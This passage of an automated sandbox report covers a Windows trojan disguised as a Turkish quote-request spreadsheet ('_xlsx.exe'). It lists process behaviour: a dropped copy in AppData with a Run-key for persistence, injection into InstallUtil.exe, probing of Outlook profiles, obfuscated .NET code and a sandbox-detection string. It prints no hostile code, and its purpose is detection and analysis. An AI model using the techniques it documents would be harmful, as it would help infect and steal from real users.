                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeStatic file information: File size 2394624 > 1048576
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x247e00
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2063013281.0000000005B60000.00000004.08000000.00040000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2043823101.0000000003557000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2164548814.0000000003714000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2175629104.00000000043E7000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2175629104.0000000004594000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000006.00000002.2251979049.0000000002A40000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000006.00000002.2272906135.0000000003787000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2063013281.0000000005B60000.00000004.08000000.00040000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2043823101.0000000003557000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2164548814.0000000003714000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2175629104.00000000043E7000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2175629104.0000000004594000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000006.00000002.2251979049.0000000002A40000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000006.00000002.2272906135.0000000003787000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2061637141.00000000057F0000.00000004.08000000.00040000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2061637141.00000000057F0000.00000004.08000000.00040000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp

                    Data Obfuscation

                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.5b60000.11.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.5b60000.11.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                    Source: Yara matchFile source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.5a40000.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.42b7e40.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.2251979049.0000000002799000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2062230360.0000000005A40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2164548814.0000000003391000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2043823101.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 6544, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Tojeiuai.exe PID: 7104, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_03117A80 push eax; ret 0_2_03117A81
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_05762EA7 push esp; retf 0_2_05762EA8
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_05AD31F7 push ebp; iretd 0_2_05AD31F8
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_05AD3234 push ss; iretd 0_2_05AD3237
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_05E26906 push ecx; retf 0_2_05E2690C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01059C30 push esp; retf 0108h2_2_01059D55
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06449242 push es; ret 2_2_06449244
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06442DBE pushfd ; retf 2_2_06442DC1
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_01697A80 push eax; ret 3_2_01697A81
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_03342EA7 push esp; retf 3_2_03342EA8
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B031F7 push ebp; iretd 3_2_05B031F8
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B03234 push ss; iretd 3_2_05B03237
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05CF509C push ebx; iretd 3_2_05CF50A0
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05CF5AA0 push esi; iretd 3_2_05CF5A82
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05E58D99 push esi; iretd 3_2_05E58D9B
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05E56906 push ecx; retf 3_2_05E5690C
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05E5482B pushfd ; iretd 3_2_05E5482D
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05E58F1D push ebp; iretd 3_2_05E58F1E
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05E53603 push cs; retf 3_2_05E53608
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_00AB7A80 push eax; ret 6_2_00AB7A81
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_051E31F7 push ebp; iretd 6_2_051E31F8
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_051E3234 push ss; iretd 6_2_051E3237
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_05426906 push ecx; retf 6_2_0542690C
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_05423603 push cs; retf 6_2_05423608
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.5950000.9.raw.unpack, YJ5DVBUWyaCY9p7rMiM.csHigh entropy of concatenated method names: 'YCoUnTG5Ce', 'MdbdKSIY2Zu9X8qabhM', 'hpcdpCIG2cBy4CqShZi', 'YtyOUkI7TnMNNLPPPZr', 'AU5iJhIEMLVYXnygwMU', 'ThfD5KI8V3HWrUX2XtL', 'kg8TTRId7V6wx3LNmvB'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.5950000.9.raw.unpack, tB3UD6BNcDYyQHMZ2UJ.csHigh entropy of concatenated method names: 'uXOB9MMTGq', 'kUlHitAsus3apG1eTTC', 'gAWfFDAHCsxr1lxkePy', 'xV6PrnAzvgiHuLEhNl7', 'OBG8VCNceSRUSgwlkdw', 'LSnIvfApucFWd3xXAiK', 'nkBFSgAJBNBmWgyQ75W'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.5950000.9.raw.unpack, cXxcj0UMBEmO881Z1fw.csHigh entropy of concatenated method names: 'RtlInitUnicodeString', 'LdrLoadDll', 'RtlZeroMemory', 'NtQueryInformationProcess', 'SlkU1Qp0aT', 'NtProtectVirtualMemory', 'sj5LYNIa6csAxKFXYJj', 'qihusRIPHOpNriWK1Kp', 'n6eFPoILKgI5Vp06TIq', 'XbBXXBIgLppRMSfBg20'
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeFile created: C:\Users\user\AppData\Roaming\Tojeiuai.exeJump to dropped file
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TojeiuaiJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: Yara match File source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 6544, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: Tojeiuai.exe PID: 7104, type: MEMORYSTR
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2043823101.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2164548814.0000000003391000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000006.00000002.2251979049.0000000002799000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Memory allocated: 1720000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Memory allocated: 31D0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Memory allocated: 51D0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 1040000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2A80000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 28C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exe Memory allocated: 1650000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exe Memory allocated: 3390000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exe Memory allocated: 3200000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: B50000 memory reserve | memory write watch
